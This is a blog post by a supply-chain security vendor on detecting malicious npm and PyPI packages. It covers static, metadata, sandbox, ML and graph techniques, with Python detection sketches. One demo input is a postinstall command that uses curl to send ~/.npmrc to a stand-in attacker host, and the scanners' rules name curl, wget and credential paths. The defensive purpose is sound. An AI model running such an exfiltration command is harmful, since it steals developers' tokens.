
Open Source Malware Detection Techniques for Package Registries

Malicious packages on npm, PyPI, and other registries are surging. Here are the techniques researchers and tools use to detect them.

Yukti Singhal
Security Researcher

The volume of malicious packages published to open source registries exploded in 2022 and showed no signs of slowing in 2023. Sonatype's 2022 State of the Software Supply Chain report cited a 742% average annual increase in software supply chain attacks over the preceding three years. npm, PyPI, and RubyGems were seeing thousands of malicious packages per month: typosquats, dependency confusion attacks, account takeovers, and outright malware.

The package registries are overwhelmed. They can't manually review every publication. Automated detection has become the primary defense, and the techniques being used are evolving rapidly.

Static Analysis Techniques

Install Script Analysis

In npm packages, malicious behavior most often lives in install lifecycle scripts such as preinstall and postinstall, which run automatically during npm install. Static analysis of install scripts looks for:

Network calls during installation: Legitimate packages rarely need to make HTTP requests during npm install. A postinstall script that calls https://attacker-server.com/exfil is highly suspicious.

Environment variable access: Malicious packages harvest environment variables to steal CI/CD tokens, cloud credentials, and API keys. Patterns like process.env combined with network calls are strong indicators.

File system access to sensitive locations: Reading ~/.ssh/, ~/.npmrc, ~/.aws/credentials, or browser cookie databases during installation is almost always malicious.

Obfuscation: Legitimate packages don't need to obfuscate their install scripts. Hex encoding, base64 encoding, eval() usage, and other obfuscation techniques in install scripts are red flags.
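
The four signals above can be sketched as a small rule-based scanner over a package.json manifest. This is a minimal illustration, not how any particular registry or tool works: the rule names, the regular expressions, and the function scan_install_scripts are all assumptions made for this example, and real scanners use far richer rules.

```python
import json
import re

# Hypothetical rule set: names and patterns are illustrative assumptions.
SUSPICIOUS_PATTERNS = {
    "network_call": re.compile(r"https?://|\bcurl\b|\bwget\b"),
    "env_access": re.compile(r"process\.env|\bprintenv\b|\$\{?[A-Z_]*(TOKEN|SECRET|KEY)"),
    "sensitive_path": re.compile(r"\.ssh/|\.npmrc|\.aws/credentials"),
    "obfuscation": re.compile(r"\beval\(|base64|\\x[0-9a-fA-F]{2}"),
}

# npm lifecycle hooks that run automatically during installation.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")


def scan_install_scripts(package_json_text: str) -> dict[str, list[str]]:
    """Return {hook: [matched rule names]} for install-time scripts."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    findings = {}
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(command)]
        if hits:
            findings[hook] = hits
    return findings


if __name__ == "__main__":
    sample = json.dumps({
        "name": "example-package",
        "scripts": {"postinstall": "curl https://attacker-server.com/exfil -d \"$(cat ~/.npmrc)\""},
    })
    print(scan_install_scripts(sample))
```

A scanner like this only inspects the command string in the manifest. If the hook runs a separate file (for example node setup.js), that file would need the same treatment.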

Code Pattern Matching

Beyond install scripts, static analysis of package source code looks for:

Data exfiltration patterns: Code that collects system information and sends it to an external server.

Reverse shell patterns: Code that establishes a network connection and binds it to a shell.

Cryptocurrency mining: Code that downloads and executes mining binaries.

Credential harvesting: Code that reads authentication files, browser storage, or keychain data.
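
As one illustration of pattern matching on source code rather than install scripts, the sketch below walks the syntax tree of a Python module and flags the combination of a socket being opened and a shell being wired to it, which is the shape of the reverse shell pattern described above. The watched call list and both function names are assumptions for this example. The check is easy to evade with import aliases or dynamic lookups, so treat it as a starting heuristic only.

```python
import ast

# Hypothetical watch list: calls that often co-occur in Python reverse shells.
SOCKET_CALLS = {"socket.socket"}
SHELL_CALLS = {"os.dup2", "subprocess.call", "subprocess.Popen", "pty.spawn"}


def find_watched_calls(source: str) -> set[str]:
    """Collect watched calls written as module.function(...) in the source."""
    seen = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            base = node.func.value
            if isinstance(base, ast.Name):
                dotted = f"{base.id}.{node.func.attr}"
                if dotted in SOCKET_CALLS | SHELL_CALLS:
                    seen.add(dotted)
    return seen


def looks_like_reverse_shell(source: str) -> bool:
    """True when the code both opens a socket and attaches a shell or process."""
    seen = find_watched_calls(source)
    return bool(seen & SOCKET_CALLS) and bool(seen & SHELL_CALLS)
```

The source is parsed, never executed, so the check is safe to run on untrusted packages.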

Metadata Analysis

Package metadata itself contains useful signals:

Package name similarity: Comparing new package names against popular packages to detect typosquats. lodasg is suspicious because it's one character away from lodash.

Publisher history: A new publisher uploading 50 packages in one hour is likely conducting a typosquatting campaign.

Description and README content: Malicious packages often have minimal or copied descriptions.

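Version patterns: A package that starts at version 99.0.0 may be a dependency confusion attempt, since an inflated version number can cause a resolver to prefer the public package over an internal package of the same name.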
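
The name-similarity and version signals lend themselves to a short sketch. The example below uses Levenshtein edit distance, which is one common choice and not necessarily what any registry uses. The POPULAR list, the distance threshold of 1, and the major-version threshold of 90 are placeholder assumptions.

```python
def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance using a two-row dynamic program."""
    previous = list(range(len(b) + 1))
    for i, ch_a in enumerate(a, start=1):
        current = [i]
        for j, ch_b in enumerate(b, start=1):
            cost = 0 if ch_a == ch_b else 1
            current.append(min(
                previous[j] + 1,         # deletion
                current[j - 1] + 1,      # insertion
                previous[j - 1] + cost,  # substitution or match
            ))
        previous = current
    return previous[-1]


# Placeholder list; a real check would use the registry's most-downloaded packages.
POPULAR = ["lodash", "express", "react", "requests"]


def possible_typosquat_targets(name: str, popular=POPULAR, max_distance: int = 1) -> list[str]:
    """Popular packages whose names are within max_distance edits of name."""
    return [p for p in popular if p != name and edit_distance(name, p) <= max_distance]


def suspicious_first_version(version: str, major_threshold: int = 90) -> bool:
    """Flag a first release whose major version is implausibly high."""
    return int(version.split(".")[0]) >= major_threshold


if __name__ == "__main__":
    print(possible_typosquat_targets("lodasg"))  # ['lodash']
    print(suspicious_first_version("99.0.0"))    # True
```

Edit distance alone produces false positives for short names, so in practice it would be combined with the publisher and download signals above.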

Dynamic Analysis Techniques

Sandboxed Installation

Sandboxed installation means running npm install or pip install in an isolated environment and monitoring system behavior:

Network monitoring: Record all DNS queries and HTTP/HTTPS connections made during installation. Legitimate packages should make zero or minimal network connections during install.

File system monitoring: Track all file reads and writes. Reading SSH keys, browser data, or credential files during installation is almost always malicious.

Process monitoring: Track child processes spawned during installation. Executing binaries, especially downloaded ones, is suspicious.

System call tracing: Low-level monitoring of system calls made during package installation provides the most complete picture of package behavior.
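
To make the monitoring step concrete, here is a minimal sketch that summarizes a system call trace after a sandboxed install. It assumes the trace was captured on Linux with something like strace -f -e trace=openat,connect -o trace.log npm install <package>, and that lines follow strace's usual text format. The sensitive path fragments and the function name summarize_trace are assumptions for this example. Only IPv4 connect calls are handled.

```python
import re

# Matches open/openat calls and captures the quoted path argument.
OPEN_RE = re.compile(r'\bopen(?:at)?\((?:AT_FDCWD, )?"([^"]+)"')
# Matches IPv4 connect calls and captures port and address.
CONNECT_RE = re.compile(
    r'\bconnect\(.*?sin_port=htons\((\d+)\), sin_addr=inet_addr\("([^"]+)"\)'
)
# Illustrative fragments; extend for browser profiles, keychains, and so on.
SENSITIVE_FRAGMENTS = ("/.ssh/", "/.npmrc", "/.aws/credentials")


def summarize_trace(lines) -> dict[str, list]:
    """Extract sensitive file opens and outbound connections from trace lines."""
    report = {"sensitive_reads": [], "connections": []}
    for line in lines:
        opened = OPEN_RE.search(line)
        if opened:
            path = opened.group(1)
            if any(fragment in path for fragment in SENSITIVE_FRAGMENTS):
                report["sensitive_reads"].append(path)
            continue
        connected = CONNECT_RE.search(line)
        if connected:
            report["connections"].append((connected.group(2), int(connected.group(1))))
    return report
```

Given a captured log, a call such as summarize_trace(open("trace.log")) would return the two lists for review. An empty report is not proof of safety, since a payload may wait until runtime.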

Runtime Behavioral Analysis

Some malicious packages only activate their payload at runtime, not during installation. Behavioral analysis of imported packages looks for:

Delayed execution: Code that uses setTimeout or sleep before executing malicious behavior, designed to evade sandbox detection.

Environment-specific triggers: Code that only executes in CI/CD environments (checking for CI environment variables) or on specific operating systems.

Conditional activation: Code that checks IP ranges, hostnames, or other environmental factors before activating.
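
One way to surface environment-specific triggers is differential analysis: run the same package under several sandbox profiles (for example with and without CI variables set) and compare what it does. The sketch below shows only the comparison step and assumes the behavior events have already been recorded as strings. The profile names and event format are hypothetical, and this is one possible approach, not one the techniques above prescribe.

```python
def environment_specific_events(observations: dict[str, set[str]]) -> dict[str, set[str]]:
    """Map each profile to the events seen there but not in every profile."""
    if not observations:
        return {}
    # Events that occurred under every profile are treated as baseline behavior.
    common = set.intersection(*observations.values())
    result = {}
    for profile, events in observations.items():
        extra = events - common
        if extra:
            result[profile] = extra
    return result


if __name__ == "__main__":
    observed = {
        "plain": {"read:package.json"},
        "ci": {"read:package.json", "connect:203.0.113.7:443"},
    }
    print(environment_specific_events(observed))
```

Behavior that appears only under the CI profile, as in this example, is the kind of conditional activation worth a closer look.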

Machine Learning Approaches

Anomaly Detection

ML models trained on legitimate packages can identify anomalies in new publications:

  • Unusual code patterns compared to similar packages
  • Unexpected file types or structures
  • Network behavior that deviates from the package's stated purpose
  • Metadata patterns inconsistent with legitimate packages
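
As a deliberately simple stand-in for a trained model, the sketch below scores a new package by how many standard deviations each of its features sits from a baseline of known-good packages. The feature names are hypothetical, and a production system would more likely use a learned model over many more features.

```python
from statistics import mean, pstdev


def anomaly_scores(baseline: list[dict[str, float]], candidate: dict[str, float]) -> dict[str, float]:
    """Per-feature absolute z-score of the candidate against baseline packages."""
    scores = {}
    for feature, value in candidate.items():
        history = [row[feature] for row in baseline]
        mu, sigma = mean(history), pstdev(history)
        # A constant baseline feature gives no scale, so score it as 0.
        scores[feature] = 0.0 if sigma == 0 else abs(value - mu) / sigma
    return scores


if __name__ == "__main__":
    known_good = [
        {"install_script_len": 10, "source_entropy": 4.0},
        {"install_script_len": 20, "source_entropy": 4.2},
        {"install_script_len": 30, "source_entropy": 4.4},
    ]
    new_package = {"install_script_len": 20, "source_entropy": 7.5}
    print(anomaly_scores(known_good, new_package))
```

A feature scoring well above roughly 3 would typically be queued for review; the exact cutoff is a tuning decision.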

Natural Language Processing

NLP techniques applied to package README files, descriptions, and documentation:

  • Detecting copied documentation from legitimate packages
  • Identifying descriptions that don't match the code's behavior
  • Flagging packages with auto-generated or nonsensical descriptions
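
Detecting copied documentation can be approximated without any heavy NLP tooling. The sketch below compares two READMEs by Jaccard similarity over three-word shingles; the shingle size and any cutoff applied to the result are assumptions to tune.

```python
import re


def shingles(text: str, size: int = 3) -> set[tuple[str, ...]]:
    """Set of overlapping word n-grams from lowercased text."""
    words = re.findall(r"[a-z0-9]+", text.lower())
    return {tuple(words[i:i + size]) for i in range(len(words) - size + 1)}


def jaccard_similarity(a: str, b: str, size: int = 3) -> float:
    """Shared shingles divided by all shingles; 0.0 if either text is too short."""
    set_a, set_b = shingles(a, size), shingles(b, size)
    if not set_a or not set_b:
        return 0.0
    return len(set_a & set_b) / len(set_a | set_b)
```

A new package whose README scores close to 1.0 against a popular package's README, while having a different publisher, matches the copied-documentation signal above.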

Graph-Based Analysis

Analyzing the dependency graph for anomalies:

  • Packages that nothing depends on (no legitimate package lists them as a dependency)
  • Circular dependency patterns designed to ensure installation
  • Sudden changes in the dependency graph of established packages
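
Two of these graph checks are simple set operations once the dependency graph is available as a mapping from package name to its direct dependencies. The graph shape and function names below are assumptions for illustration. Note that top-level applications also have no dependents, so the first check needs to be combined with other signals.

```python
def packages_without_dependents(dependencies: dict[str, set[str]]) -> set[str]:
    """Packages in the graph that no other package lists as a dependency."""
    depended_on = set().union(*dependencies.values())
    return set(dependencies) - depended_on


def dependency_changes(old: set[str], new: set[str]) -> dict[str, set[str]]:
    """Dependencies added or removed between two versions of one package."""
    return {"added": new - old, "removed": old - new}


if __name__ == "__main__":
    graph = {
        "app": {"lodash", "left-pad"},
        "lodash": set(),
        "left-pad": set(),
        "lodasg": set(),
    }
    print(packages_without_dependents(graph))
    print(dependency_changes({"lodash"}, {"lodash", "lodasg"}))
```

For an established package, a non-empty "added" set in a patch release is the kind of sudden change worth reviewing before upgrading.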

Registry-Level Defenses

npm

npm has invested in multiple layers of defense:

  • Automated malware detection scanning all new publications
  • Mandatory 2FA for high-impact packages
  • Token revocation when stolen tokens are detected
  • Community reporting mechanisms

PyPI

PyPI has implemented:

  • Mandatory 2FA for critical packages
  • Malware checks on new uploads
  • Trusted Publisher support (OIDC-based publishing from GitHub Actions)
  • Community reporting through the security@pypi.org channel

Sigstore Integration

Both npm and PyPI are integrating Sigstore for package provenance:

  • npm supports provenance attestations, signed through Sigstore, for packages published from GitHub Actions
  • PyPI's Trusted Publishers feature uses OIDC identities to tie each upload to the repository and workflow that published it

What You Can Do

Before Installing

  1. Check the package name carefully — typosquats rely on speed and inattention
  2. Verify the publisher — check their history on the registry
  3. Check download counts and age — brand new packages with no downloads deserve scrutiny
  4. Read the source — for new or unfamiliar packages, review the code before installing
  5. Run npm audit or an equivalent when adding new dependencies; it only reports packages with published advisories, so a clean result is not proof of safety

After Installing

  1. Use lockfiles — they prevent silent package substitution
  2. Disable install scripts where possible — npm install --ignore-scripts
  3. Monitor for behavioral anomalies in your applications
  4. Regularly audit your dependency tree for packages you don't recognize
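
Lockfiles prevent silent substitution because they record a content hash for each package alongside its version. In npm's package-lock.json this is the integrity field, a string of the form algorithm-base64digest. The sketch below shows the check a client performs, under the assumption that the integrity value holds a single hash; the function names are made up for this example.

```python
import base64
import hashlib


def sri_digest(data: bytes, algorithm: str = "sha512") -> str:
    """Build an integrity string of the form '<algorithm>-<base64 digest>'."""
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def matches_lockfile_integrity(tarball: bytes, integrity: str) -> bool:
    """True when the tarball bytes hash to the value recorded in the lockfile."""
    # Assumes one hash per integrity string; hashlib raises ValueError
    # if the algorithm prefix is not one it supports.
    algorithm = integrity.split("-", 1)[0]
    return sri_digest(tarball, algorithm) == integrity


if __name__ == "__main__":
    original = b"contents of the published tarball"
    recorded = sri_digest(original)
    print(matches_lockfile_integrity(original, recorded))
    print(matches_lockfile_integrity(b"tampered contents", recorded))
```

If a registry or mirror serves different bytes for a pinned version, the hash comparison fails and the install should stop.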

How Safeguard.sh Helps

Safeguard.sh employs multiple detection techniques to protect against malicious packages:

  • Multi-Layer Analysis: Safeguard.sh combines static analysis, metadata analysis, and behavioral signals to detect malicious packages before they enter your supply chain.
  • Typosquat Detection: Safeguard.sh compares your dependencies against known legitimate packages, flagging potential typosquats and name confusion attacks.
  • Continuous Monitoring: Safeguard.sh doesn't just check packages at install time — it continuously monitors your dependencies for newly discovered malicious behavior, catching packages that were initially clean but were later compromised.
  • Registry Intelligence: Safeguard.sh tracks malicious package campaigns across registries, providing early warning when attack patterns similar to known campaigns are detected.

The volume of malicious packages isn't going to decrease. The economics favor the attackers — publishing a malicious package costs nothing and takes seconds. Defending against them requires layered detection, continuous monitoring, and tools purpose-built for this threat.
